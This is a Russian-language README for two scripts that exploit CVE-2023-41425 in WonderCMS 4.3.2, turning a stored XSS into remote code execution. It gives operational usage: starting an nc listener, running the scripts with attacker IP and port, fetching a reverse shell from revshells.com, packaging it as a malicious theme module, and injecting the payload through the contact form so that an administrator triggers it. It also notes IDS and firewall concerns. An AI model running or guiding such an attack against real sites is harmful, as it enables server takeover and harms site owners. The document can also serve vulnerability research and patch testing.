
WonderCMS 4.3.2 — эксплойты XSS to RCE
Обзор
Данные скрипты эксплуатируют уязвимость межсайтового скриптинга (XSS) в WonderCMS 4.3.2 для достижения удалённого выполнения кода (RCE). XSS-полезная нагрузка при срабатывании у администратора автоматически устанавливает обратную оболочку на целевой сервер с помощью сфабрикованного вредоносного модуля темы. Обратная оболочка загружается с revshells.com и выполняется, предоставляя атакующему удалённый доступ к серверу.
Содержание
Предварительные требования
Для успешного запуска любого из скриптов необходимы следующие инструменты и условия:
- Bash-оболочка: оба скрипта написаны для Linux-окружений с использованием Bash.
- netcat (nc): используется для прослушивания соединения обратной оболочки.
- Python3: простой HTTP-сервер на Python используется для размещения XSS-нагрузки.
- WonderCMS 4.3.2: целевая система должна работать под управлением уязвимой версии WonderCMS.
- Взаимодействие администратора: нагрузка требует, чтобы администратор инициировал XSS, что приводит к выполнению обратной оболочки.
- revshells.com: полезная нагрузка обратной оболочки динамически загружается с revshells.com.
Скрипт 1: автоматический эксплойт
POC
Pasted image 20241010021603
Возможности
Данная версия эксплойта автоматически проверяет активность слушателя nc, загружает обратную оболочку, запускает HTTP-сервер, отправляет нагрузку и ожидает, когда администратор инициирует обратную оболочку.
- Автоматическая настройка обратной оболочки: загружает предварительно сгенерированную обратную оболочку с revshells.com.
- Внедрение XSS-нагрузки: внедряет XSS-нагрузку в контактную форму цели.
- Управление HTTP-сервером: автоматически запускает HTTP-сервер на Python для размещения полезной нагрузки обратной оболочки.
- Проверка слушателя nc: убеждается, что слушатель запущен, прежде чем продолжить.
- Автоматическая отправка нагрузки: отправляет нагрузку автоматически без взаимодействия с пользователем.
Использование
- Убедитесь, что слушатель
nc запущен на указанном порту:
nc -nvlp <PORT>
- Запустите скрипт следующей командой:
./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
Пример:
./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
Последовательность действий
- Загрузка обратной оболочки: скрипт загружает обратную оболочку с
revshells.com.
- Изменение обратной оболочки: скрипт обновляется с IP-адресом и портом атакующего.
- Создание ZIP-нагрузки: создаётся ZIP-файл, содержащий обратную оболочку.
- Формирование XSS-нагрузки: генерируется XSS-нагрузка, устанавливающая обратную оболочку, и внедряется в уязвимую контактную форму.
- Автозапуск HTTP-сервера: скрипт запускает HTTP-сервер на Python для обслуживания вредоносной нагрузки.
- Автоматическая отправка нагрузки: XSS-нагрузка автоматически отправляется администратору.
Скрипт 2: ручной эксплойт
POC
Pasted image 20241010013048
Используйте эксплойт, предоставленный скриптом, в поле «Website»…
Pasted image 20241010013218
Возможности
Эта версия требует, чтобы пользователь вручную управлял слушателем nc и инициировал XSS-нагрузку. Она больше подходит для сценариев, где автоматические процессы нежелательны.
- Ручная настройка обратной оболочки: пользователь отвечает за запуск слушателя.
- Ручное инициирование XSS: скрипт предоставляет вредоносную ссылку для отправки администратору, но нагрузка должна быть инициирована вручную.
- Управление HTTP-сервером: запускает HTTP-сервер на Python для размещения XSS-нагрузки.
Использование
- Убедитесь, что слушатель
nc запущен на указанном порту:
nc -nvlp <PORT>
- Запустите скрипт следующей командой:
./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
Пример:
./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
Последовательность действий
- Загрузка обратной оболочки: загружает обратную оболочку с
revshells.com.
- Изменение обратной оболочки: обновляет обратную оболочку с IP-адресом и портом атакующего.
- Создание ZIP-нагрузки: создаёт ZIP-файл, содержащий обратную оболочку.
- Формирование XSS-нагрузки: генерирует XSS-нагрузку, которая устанавливает обратную оболочку.
- Отображение вредоносной ссылки: показывает ссылку, которую необходимо отправить администратору для инициирования.
- Запуск HTTP-сервера: запускает HTTP-сервер на Python для размещения нагрузки.
Примечания
- Взаимодействие администратора: оба эксплойта полагаются на то, что администратор WonderCMS инициирует XSS-нагрузку, посетив уязвимую страницу. После срабатывания устанавливается обратная оболочка с машиной атакующего.
- Firewall/IDS/IPS: соблюдайте осторожность при запуске этих эксплойтов в средах, защищённых межсетевыми экранами или системами обнаружения вторжений (IDS), которые могут блокировать подозрительную активность или выдавать предупреждения.
- Ответственное раскрытие: если вы обнаружите, что цель уязвима, всегда следуйте этическим рекомендациям и сообщайте об уязвимости соответствующим сторонам.